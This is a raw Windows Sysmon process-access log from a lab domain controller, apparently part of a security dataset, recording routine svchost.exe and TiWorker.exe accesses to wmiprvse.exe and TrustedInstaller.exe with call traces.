12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.144{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.128{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.128{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.128{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.112{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:28.097{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 